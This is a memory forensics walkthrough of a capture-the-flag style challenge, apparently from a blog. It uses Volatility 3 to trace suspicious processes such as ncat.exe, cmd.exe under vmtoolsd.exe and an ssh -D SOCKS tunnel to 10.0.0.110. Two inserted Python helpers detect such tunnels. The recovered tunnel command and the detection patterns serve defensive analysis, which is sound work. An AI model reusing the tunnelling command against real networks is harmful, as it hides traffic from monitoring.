<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+'
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
***** 1364 7072 conhost.exe 0xe78c05e54080 3 - 1 False 2023-11-16 23:01:17.000000 N/A</span>
</pre></div></div><div><br /></div></div><div><div>We now have another 5 processes, for a total of 8, that seem to be of immediate concern to me (your perspective may differ).</div><div><br /></div><div>I am going to close off with this final group. I see Windows Terminal is the parent or grandparent of these processes. So at first glance, while I would not consider them suspicious, I still consider them items to be reviewed. Trust but verify!<br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+'
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A
***** 6152 4728 cmd.exe 0xe78bf5caf0c0 1 - 1 False 2023-11-16 20:16:37.000000 N/A</span>
</pre></div></div><div><br /></div><div>We now have a total of 18 processes that I will consider suspicious.</div></div><div><br /></div><div><div><b>Q:</b> Why do you think these processes are suspicious?</div><div><b>A:</b> Now, everyone's suspicions may vary. However, for this scenario, these represent my starting point. I chose these primarily because I see <i>powershell.exe</i> and <i>cmd.exe</i>, and in some cases I'm concerned about the parent spawning these shells. For example, why is vmtoolsd.exe spawning <i>cmd.exe</i>? That is a big concern. Maybe it is normal, maybe it is not. However, our job is to find out.</div><div><br /></div><div>With the suspicious processes identified, let's write all of those to a file so we can keep them separated from everything else and make our analysis easier and somewhat cleaner.</div></div><br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '896'
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '896' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls suspicious_processes.txt
suspicious_processes.txt</span>
</pre><div><br /></div></div></div><div><br /></div><div>With a list of suspicious processes, we can now look forward:</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat suspicious_processes.txt
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
***** 1364 7072 conhost.exe 0xe78c05e54080 3 - 1 False 2023-11-16 23:01:17.000000 N/A
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A
***** 6152 4728 cmd.exe 0xe78bf5caf0c0 1 - 1 False 2023-11-16 20:16:37.000000 N/A</span>
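<span style="color: white;">The children and grandchildren questions earlier, and the grep '896' pipeline that built the list above (it also pulled in SgrmBroker.exe, PID 5896, because 896 is a substring of 5896), can be answered by parsing the pstree.txt rows instead of matching whitespace-delimited numbers. This is an added example, not code from the post or from Volatility; the sample rows are copied from the output above and are deliberately partial, so the counts are for this sample only, not for the full file.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample: rows copied from the windows.pstree output shown above.
# It is deliberately partial, so every count below is a count for this sample,
# not for the full pstree.txt. A row is:
# depth-markers PID PPID ImageFileName Offset Threads Handles SessionId Wow64 CreateTime ExitTime
PSTREE_SAMPLE = """\
** 884 696 svchost.exe 0xe78bf2c90080 19 - 0 False 2023-11-16 19:09:13.000000 N/A
*** 9736 884 backgroundTask 0xe78bf61b4080 7 - 1 False 2023-11-16 23:26:04.000000 N/A
*** 2576 884 TextInputHost. 0xe78bf33c1080 21 - 1 False 2023-11-16 19:25:22.000000 N/A
*** 6804 884 RuntimeBroker. 0xe78bf4e2d080 9 - 1 False 2023-11-16 19:25:24.000000 N/A
*** 3224 884 dllhost.exe 0xe78bf49c2080 7 - 1 False 2023-11-16 19:25:02.000000 N/A
** 1652 696 svchost.exe 0xe78bf2fb1080 11 - 0 False 2023-11-16 19:09:18.000000 N/A
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A
***** 2796 644 cmd.exe 0xe78bf68ce0c0 1 - 1 False 2023-11-16 21:29:22.000000 N/A
****** 4668 2796 chrome.exe 0xe78bf69ac0c0 43 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 9152 4668 chrome.exe 0xe78bf65570c0 15 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 6944 4668 chrome.exe 0xe78bf68a8080 15 - 1 False 2023-11-16 21:29:46.000000 N/A
******* 2392 4668 chrome.exe 0xe78bf658a0c0 18 - 1 False 2023-11-16 21:30:06.000000 N/A
"""

# One row: a run of '*' depth markers (absent for roots such as System), PID, PPID, image name.
ROW_RE = re.compile(r"^(\**)\s*(\d+)\s+(\d+)\s+(\S+)")


@dataclass
class Process:
    pid: int
    ppid: int
    name: str
    depth: int                                   # number of leading '*' markers
    children: List[int] = field(default_factory=list)


def parse_pstree(text: str) -> Dict[int, Process]:
    """Parse windows.pstree text into a PID-keyed map and link children via PPID."""
    procs: Dict[int, Process] = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue                             # framework banner, progress line, header, blank
        stars, pid, ppid, name = m.groups()
        procs[int(pid)] = Process(int(pid), int(ppid), name, len(stars))
    for p in procs.values():
        if p.ppid in procs:
            procs[p.ppid].children.append(p.pid)
    return procs


def descendants_at(procs: Dict[int, Process], pid: int, level: int) -> List[int]:
    """PIDs exactly `level` generations below `pid` (1 = children, 2 = grandchildren)."""
    frontier = [pid]
    for _ in range(level):
        frontier = [c for p in frontier for c in procs[p].children]
    return frontier


def largest_at(procs: Dict[int, Process], level: int, min_depth: int = 2) -> Tuple[int, int]:
    """(pid, count) of the process with the most descendants at `level`, considering only
    rows with at least `min_depth` markers, i.e. the '**' starting point used in the post."""
    candidates = [p for p in procs.values() if p.depth >= min_depth]
    best = max(candidates, key=lambda p: len(descendants_at(procs, p.pid, level)))
    return best.pid, len(descendants_at(procs, best.pid, level))


def subtree(procs: Dict[int, Process], pid: int) -> List[int]:
    """Exact-PID subtree, parent first. Unlike grep '896', PID 5896 is never pulled in."""
    out: List[int] = []
    stack = [pid]
    while stack:
        cur = stack.pop()
        out.append(cur)
        stack.extend(reversed(procs[cur].children))
    return out


if __name__ == "__main__":
    tree = parse_pstree(PSTREE_SAMPLE)
    print("most children     :", largest_at(tree, 1))
    print("most grandchildren:", largest_at(tree, 2))
    print("ncat.exe subtree  :", subtree(tree, 896))
```

Point parse_pstree at the full pstree.txt to apply the same checks to the complete tree.</span>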
</pre><div><br /></div></div></div><div><br /></div></div><div>With each of the suspicious processes identified, we can go through the same steps for all of them:</div><div>1. Get the command line</div><div>2. Get the DLLs the process was using</div><div>3. Perform a file scan</div><div>4. Attempt to dump files</div><div>5. Get the environment variables</div><div>6. Get the SIDs</div><div>7. Get the handles</div><div>8. Attempt to find malware in the process</div><div>9. Look at the privileges the process was running with</div><div>10. Look at the Windows registry</div><div><br /></div><div>We more than likely will not follow this pattern, but it is something you may want to do. In incident response, you pivot based on the evidence you have or encounter. </div><div><br /></div><div>Let's start with the process command lines.</div><div><br /></div><div>Extracting all the command lines and writing them to a file:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;">windows.cmdline.CmdLine > cmdline.txt</span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><div><b>Q</b>: Looking at the processes you considered as suspicious, did you find anything interesting in the command line?</div><div><br /></div><div><b>A</b>: I did not find anything that immediately stood out. I did, however, add <i>PID 4444</i> and <i>4668 </i>to this list, as we can see SSH being used to set up a "dynamic" proxy on port 9999, using username kali to connect to the host at <i>10.0.0.110</i>. Remember, <i>10.0.0.110</i> is an IP address we saw above. Also, notice the "<i>-N</i>"? This will not return an SSH terminal, meaning there is no intention to authenticate and interact with this host via a terminal.</div><div><br /></div><div>At the same time, it is not every day that we see chrome.exe being run from the command line. This command line also ties into the ssh session at PID <i>4444</i>: chrome.exe is pointed at the local SOCKS listener on port <i>9999</i>, so its traffic is being proxied through the SSH session to the device at <i>10.0.0.110</i>.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --perl-regexp '896|8724|7164|5176|4940|7072|2460|644|4852|3032|4728|6152|4444|4668' cmdline.txt
5896 SgrmBroker.exe C:\Windows\system32\Sgrm\SgrmBroker.exe
7164 vmtoolsd.exe "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
2460 WindowsTermina "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.12.10983.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe"
4728 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6152 cmd.exe Required memory at 0xb247af2020 is inaccessible (swapped)
4444 ssh.exe ssh -D 9999 kali@10.0.0.110 -N -vvv
644 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
4668 chrome.exe chrome.exe --proxy-server="socks5://127.0.0.1:9999"
4852 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3032 cmd.exe C:\Windows\System32\cmd.exe
5176 cmd.exe Required memory at 0x62a2d2020 is not valid (process exited?)
4940 cmd.exe C:\Windows\system32\cmd.exe
896 ncat.exe Required memory at 0x846628 is inaccessible (swapped)
8724 cmd.exe Required memory at 0x2f23020 is inaccessible (swapped)
7072 cmd.exe C:\Windows\system32\cmd.exe</span>
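<span style="color: white;">The ssh -D / chrome.exe --proxy-server pairing spotted above can be checked mechanically across the whole cmdline.txt rather than by eye. This is an added example, not code from the post or from Volatility; the sample rows are copied from the output above, and the helper also separates out the rows Volatility could not read so they are not mistaken for harmless, empty command lines.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: rows copied from the windows.cmdline output shown above (not the
# full cmdline.txt). Each row is: PID Process Args, where Args is free text.
CMDLINE_SAMPLE = """\
PID Process Args
7164 vmtoolsd.exe "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" -n vmusr
4444 ssh.exe ssh -D 9999 kali@10.0.0.110 -N -vvv
644 powershell.exe C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
4668 chrome.exe chrome.exe --proxy-server="socks5://127.0.0.1:9999"
896 ncat.exe Required memory at 0x846628 is inaccessible (swapped)
5176 cmd.exe Required memory at 0x62a2d2020 is not valid (process exited?)
"""

# ssh -D [bind_address:]port opens a dynamic (SOCKS) forward; the optional bind part is skipped.
SSH_DYNAMIC_RE = re.compile(r"(?:^|\s)-D\s*(?:\S+?:)?(\d+)(?=\s|$)")
# -N asks ssh not to execute a remote command, i.e. the session exists only to forward ports.
SSH_NO_SHELL_RE = re.compile(r"(?:^|\s)-N(?=\s|$)")
SSH_TARGET_RE = re.compile(r"(\S+@\S+)")
# Any argument pointing a program at a SOCKS proxy, e.g. --proxy-server="socks5://127.0.0.1:9999"
SOCKS_RE = re.compile(r"socks[45]h?://(\S+?):(\d+)", re.IGNORECASE)
LOOPBACK = ("127.0.0.1", "localhost", "::1", "[::1]")


def parse_cmdline(text: str) -> Dict[int, Tuple[str, str]]:
    """PID -> (process name, args). Banner, progress, header and blank lines are skipped."""
    rows: Dict[int, Tuple[str, str]] = {}
    for line in text.splitlines():
        parts = line.strip().split(None, 2)
        if len(parts) in (0, 1) or not parts[0].isdigit():
            continue
        args = parts[2] if len(parts) == 3 else ""
        rows[int(parts[0])] = (parts[1], args)
    return rows


def unreadable(rows: Dict[int, Tuple[str, str]]) -> List[int]:
    """PIDs whose command line could not be read (swapped out or exited). These are
    unknowns to chase via other artefacts, not processes cleared of suspicion."""
    return [pid for pid, (_, args) in rows.items() if args.startswith("Required memory")]


def dynamic_ssh_proxies(rows: Dict[int, Tuple[str, str]]) -> List[dict]:
    """Every ssh command line that opens a dynamic (SOCKS) forward with -D."""
    found = []
    for pid, (name, args) in rows.items():
        if not name.lower().startswith("ssh"):   # a renamed ssh binary would not be caught here
            continue
        m = SSH_DYNAMIC_RE.search(args)
        if not m:
            continue
        target = SSH_TARGET_RE.search(args)
        found.append({
            "ssh_pid": pid,
            "port": int(m.group(1)),
            "target": target.group(1) if target else None,
            "no_shell": SSH_NO_SHELL_RE.search(args) is not None,
        })
    return found


def socks_consumers(rows: Dict[int, Tuple[str, str]]) -> List[Tuple[int, str, str, int]]:
    """(pid, name, host, port) for processes whose arguments point at a SOCKS proxy."""
    out = []
    for pid, (name, args) in rows.items():
        m = SOCKS_RE.search(args)
        if m:
            out.append((pid, name, m.group(1), int(m.group(2))))
    return out


def correlate(text: str) -> List[dict]:
    """Pair each ssh -D forward with the processes sending traffic to that loopback port."""
    rows = parse_cmdline(text)
    consumers = socks_consumers(rows)
    findings = []
    for proxy in dynamic_ssh_proxies(rows):
        proxy["consumers"] = sorted(
            pid for pid, _, host, port in consumers
            if port == proxy["port"] and host.lower() in LOOPBACK
        )
        findings.append(proxy)
    return findings


if __name__ == "__main__":
    print("unreadable:", unreadable(parse_cmdline(CMDLINE_SAMPLE)))
    print("findings  :", correlate(CMDLINE_SAMPLE))
```
</span>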
</pre></div></div><div><br /></div></div><div><div>Having not found anything interesting in the command line of those "suspicious" processes, we might have wanted to give up. However, we did find signs of possible proxying going on. Note also that the command lines for ncat.exe (896) and for cmd.exe 8724, 6152 and 5176 could not be read (swapped out or the process had exited), so "nothing interesting" for those means "nothing available", not "nothing malicious".</div><div><br /></div><div>Outside of the proxying, I am lacking enough evidence to strengthen my suspicion. Truly disappointed, but this is how things go. I was really hoping to find the smoking gun(s) in the command line, but that was not to be. Still sticking with my suspicious processes.</div><div><br /></div><div>Since there was not enough meaningful information found in the command line, let's see if the <i>malfind </i>plugin finds anything in the processes we considered suspicious.</div><div><br /></div><div>Malfind helps us find malware that has been injected into or is hidden in user-mode memory. <i>malfind</i> helps us detect malware that standard tools do not see; it looks at page permissions and VAD tags, for example.</div><div><br /></div><div>There are a couple of approaches here: we can test each PID one at a time, such as:</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896</span>
</pre></div></div><div><br /></div></div><div>Or we can add multiple:</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148</span>
</pre><div><br /></div></div></div><div><br /></div></div><div>Let's take the last route so we can run all the PIDs through at one time. Let's start off by getting them all on one line, separated by a space:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat suspicious_processes.txt | awk --field-separator=' ' '{ print $2 }' | tr '\n' ' '
896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 6152</span>
</pre></div></div><div><br /></div></div><div>Using the previously generated list of PIDs, we see the following:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 615
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm
7164 vmtoolsd.exe 0x1b986d60000 0x1b986d91fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b986d60000: add byte ptr [rax], al
...
7164 vmtoolsd.exe 0x1b987d90000 0x1b987dc1fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b987d90000: add byte ptr [rax], al
...
From the above, it seems malicious code has been injected into the vmtoolsd.exe process, starting at memory address 0x1b986d60000 and ending at 0x1b986d91fff. We see "VadS", meaning there is no memory-mapped file occupying this space.
Similarly, we see below the suspicious code in PowerShell with PID 4852 at 0x7df4d16b0000:
4852 powershell.exe 0x7df4d16b0000 0x7df4d16bffff VadS PAGE_EXECUTE_READWRITE 1 1 Disabled
00 00 00 00 00 00 00 00 ........
78 0d 00 00 00 00 00 00 x.......
0c 00 00 00 49 c7 c2 00 ....I...
00 00 00 48 b8 10 e8 16 ...H....
4c f8 7f 00 00 ff e0 49 L......I
c7 c2 01 00 00 00 48 b8 ......H.
10 e8 16 4c f8 7f 00 00 ...L....
ff e0 49 c7 c2 02 00 00 ..I.....
0x7df4d16b0000: add byte ptr [rax], al
...</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>This information is helpful. When we initially looked at the process tree, there was a concern as to why the vmtoolsd.exe process at <i>PID 7164</i> spawned multiple <i>cmd.exe</i>.</div><div><br /></div><div>With this in place, it is time for the questions.</div><div><br /></div><div><b>Q:</b> Which of your suspicious processes seem to have malware injected, or hidden code, in user-mode memory?</div><div><b>A:</b> We seem to be making progress at this point. Our initial analysis showed concern about <i>vmtoolsd.exe</i> with PID 7164 spawning multiple <i>cmd.exe</i>. </div><div><br /></div><div>Similarly, we see powershell.exe with PID 4852, spawned by Windows Terminal, as having malware. Initially, I did not have a concern about this, but now I do. </div><div><br /></div><div>Revisiting these processes: at this point, suspicion can be pointed at both parent and child.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '7164|4852|2460'
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A</span>
</pre></div></div><div><br /></div></div><div><div>For now, let's stay focused on the <i>vmtoolsd.exe</i> with PID 7164 and the PowerShell with PID 4852. We can't investigate everything, so let's prioritize and focus on these two for now.</div><div><br /></div><div>With suspicious code found, let's dump these out.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind --pid 7164 4852 --dump</span>
</pre></div></div><div><br /></div></div><div>Verifying the created files</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">ls pid.* -l
-rw------- 1 kali kali 65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp</span>
</pre><div><br /></div></div></div><div><br /></div></div><div>Interesting, passing these files through ClamAV did not produce any signs of maliciousness.</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">clamscan pid.*
Loading: 17s, ETA: 0s [========================>] 8.68M/8.68M sigs
Compiling: 4s, ETA: 0s [========================>] 41/41 tasks
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp: OK
